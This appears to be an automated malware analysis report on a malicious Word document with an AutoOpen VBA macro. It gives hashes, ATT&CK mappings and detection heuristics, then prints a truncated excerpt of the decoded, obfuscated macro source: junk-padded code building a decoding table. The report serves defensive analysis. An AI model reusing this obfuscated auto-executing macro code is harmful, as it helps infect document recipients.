Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5e4b74a279fcf9d1…

MALICIOUS

Office (OLE)

Size: 125.5 KB
Created: 2018-04-12 16:21:00
Authoring application: Microsoft Office Word
First seen: 2019-05-31
MD5: 00ba6576e51a64ffc8ffa22cea930119
SHA-1: d780bafea192aa8d6c24a8ac5968c96336e28dcb
SHA-256: 5e4b74a279fcf9d13a450390491d1b7b3b91732dc847eee3629f970a05c985f5
Risk Score: 222

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 Malicious File

The sample is a malicious Office document containing obfuscated VBA macros. The AutoOpen macro utilizes CreateObject, a common technique for executing arbitrary code, and the ClamAV heuristic indicates it's a known malicious macro. The script's intent is to execute code, likely downloading a second-stage payload from the embedded URL.

Heuristics (7)

  • ClamAV: Doc.Macro.Obfuscated-6397052-2 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Macro.Obfuscated-6397052-2
  • VBA macros detected [medium, 3 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • CreateObject call [high] (OLE_VBA_CREATEOBJ)
    CreateObject call
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL — Channel
    • http://www.isprambiente.gov.it/files/temi/rischio-industriale/stabilimenti.jpg — In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/ — In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# — In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ — In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# — In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/ — In document text (OLE body)
    • http://purl.org/dc/elements/1.1/ — In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main — In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 75234 bytes
SHA-256: 537f7fcfec6931cb1207cd694efe01b3e94b03b32a1436717ab194fe51ac58a2

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "PFP5Ux"
Public Function MEsuBNgYlZiAUmpm(ClOd9LNgfqkymOn As String, Optional obRWBYmdG9wiDh As Boolean = True) As String
Static NKEqE36sMC23NX3(0 To 255) As Byte
Dim GNe0vqpKSD0MOVns() As Byte, oTnSyP5ksG9CaG() As Byte
Dim PAImiUUwc6lCznO As Long, kkXiUGfbFE2U3Hoqmt As Long
If NKEqE36sMC23NX3(0) = 0 Then
Dim OlDh2kTwjlFsXb As Integer
Dim hS47mrkr57s As String
OlDh2kTwjlFsXb = 7795
Dim bFiEmKJt5xD As Integer
hS47mrkr57s = Right(CStr(OlDh2kTwjlFsXb), 1)
bFiEmKJt5xD = CInt(hS47mrkr57s)
For EdfYg31Vzxd = bFiEmKJt5xD To 56
OlDh2kTwjlFsXb = OlDh2kTwjlFsXb + 9
Next EdfYg31Vzxd
Dim IqxjK2DWSCh20b, IPX9nK3wL44 As String
IqxjK2DWSCh20b = 5
IPX9nK3wL44 = 3
#If IqxjK2DWSCh20b > IPX9nK3wL44 Then
Dim t0BGqxmyFHE As LongPtr
#Else
Dim t0BGqxmyFHE As Integer
t0BGqxmyFHE = 5 + 3
Dim mF56RIbpaiF As Integer
For mF56RIbpaiF = 0 To IqxjK2DWSCh20b
mF56RIbpaiF = mF56RIbpaiF + 1
Next mF56RIbpaiF
#End If
For PAImiUUwc6lCznO = 0 To 255
Dim Z5pSCCQlN4EvTG As Object
NKEqE36sMC23NX3(PAImiUUwc6lCznO) = 255
Next PAImiUUwc6lCznO
Dim jtqiJXbz63RuTn As String
jtqiJXbz63RuTn = Application.UserName
Dim jkwNi4Ia2og, jFEyq3h4P0BCZ9 As Integer
jFEyq3h4P0BCZ9 = Len(jtqiJXbz63RuTn)
Dim mYViEs6oEcN As Collection
While jFEyq3h4P0BCZ9 > 2
jkwNi4Ia2og = jkwNi4Ia2og + 4
jFEyq3h4P0BCZ9 = jFEyq3h4P0BCZ9 - 6
Wend
Dim HflHLKXHSftRyF As String
Dim zNCqbxsF0yIoIi, V5v14GaLeSr As Integer
zNCqbxsF0yIoIi = 1
V5v14GaLeSr = 9
#If THqJrLyRDyb <> 0 Then
THqJrLyRDyb = THqJrLyRDyb + 2
Dim uOoG2IS9vaD As Variant
Else
Dim uOoG2IS9vaD As Object
#End If
If zNCqbxsF0yIoIi > V5v14GaLeSr Then
For sHWxJTJCztu8Es = V5v14GaLeSr To zNCqbxsF0yIoIi
V5v14GaLeSr = V5v14GaLeSr / zNCqbxsF0yIoIi
Next sHWxJTJCztu8Es
End If
For PAImiUUwc6lCznO = 0 To 25
Dim QQiw1BeIBBsIPk As Integer
NKEqE36sMC23NX3(PAImiUUwc6lCznO + 65) = PAImiUUwc6lCznO
Next PAImiUUwc6lCznO
For PAImiUUwc6lCznO = 26 To 51
Dim r6UJlVMqZ1upsQ As String
Dim ihP2WkPLSMA As String
ihP2WkPLSMA = jwE4WBts8U0
r6UJlVMqZ1upsQ = Z9OyOlItt7j
If (StrComp(r6UJlVMqZ1upsQ, ihP2WkPLSMA, vbTextCompare) <> 0) Then
MsgBox ("Optional: TBlwrMD5noIJ5j.")
End If
NKEqE36sMC23NX3(PAImiUUwc6lCznO + 71) = PAImiUUwc6lCznO
Dim rF3sAxbMihDorS As Integer
For OrOnqZWSPz8 = 7 To 77
rF3sAxbMihDorS = OrOnqZWSPz8
Next OrOnqZWSPz8
Next PAImiUUwc6lCznO
Dim fXOtHNi1IqVbfm As Object
Dim NHauWe7yhoGwro As String
NHauWe7yhoGwro = Application.UserName
Dim sR94XdsLK32, WKjd4tsWE7h2W0 As Integer
WKjd4tsWE7h2W0 = Len(NHauWe7yhoGwro)
Dim AnPCavYTJNj As Collection
While WKjd4tsWE7h2W0 > 2
sR94XdsLK32 = sR94XdsLK32 + 6
WKjd4tsWE7h2W0 = WKjd4tsWE7h2W0 - 7
Wend
For PAImiUUwc6lCznO = 52 To 61
Dim fuCHkDnLL3jP5j, NmVmYa2bzWg As Integer
fuCHkDnLL3jP5j = 5
NmVmYa2bzWg = 5
#If nTItNWVgOav <> 0 Then
nTItNWVgOav = nTItNWVgOav + 9
Dim YIhkLcbZkzH As Variant
Else
Dim YIhkLcbZkzH As Object
#End If
If fuCHkDnLL3jP5j > NmVmYa2bzWg Then
For PfpUkonlK6ql0u = NmVmYa2bzWg To fuCHkDnLL3jP5j
NmVmYa2bzWg = NmVmYa2bzWg / fuCHkDnLL3jP5j
Next PfpUkonlK6ql0u
End If
NKEqE36sMC23NX3(PAImiUUwc6lCznO - 4) = PAImiUUwc6lCznO
Dim k0qAd3WDaIAgGf, rYLKi42Ns1X As Integer
k0qAd3WDaIAgGf = 8
rYLKi42Ns1X = 2
#If Etg0D3pVrX8 <> 0 Then
Etg0D3pVrX8 = Etg0D3pVrX8 + 4
Dim dagfYpM3miw As Variant
Else
Dim dagfYpM3miw As Object
#End If
If k0qAd3WDaIAgGf > rYLKi42Ns1X Then
For N1ecFR2neHymYJ = rYLKi42Ns1X To k0qAd3WDaIAgGf
rYLKi42Ns1X = rYLKi42Ns1X / k0qAd3WDaIAgGf
Next N1ecFR2neHymYJ
End If
Next PAImiUUwc6lCznO
Dim zoraOWaeSjzGpK As String
Dim sva6rVPAF6h As String
sva6rVPAF6h = j6wKL8b4Vpr
zoraOWaeSjzGpK = uXKGnZiLABq
If (StrComp(zoraOWaeSjzGpK, sva6rVPAF6h, vbTextCompare) <> 0) Then
MsgBox ("Optional: UjENUqB29jv3iZ.")
End If
NKEqE36sMC23NX3(43) = 62
Dim fq9FckpxX3ZMKh, ETChpxXi1bN As Integer
fq9FckpxX3Z
... (truncated)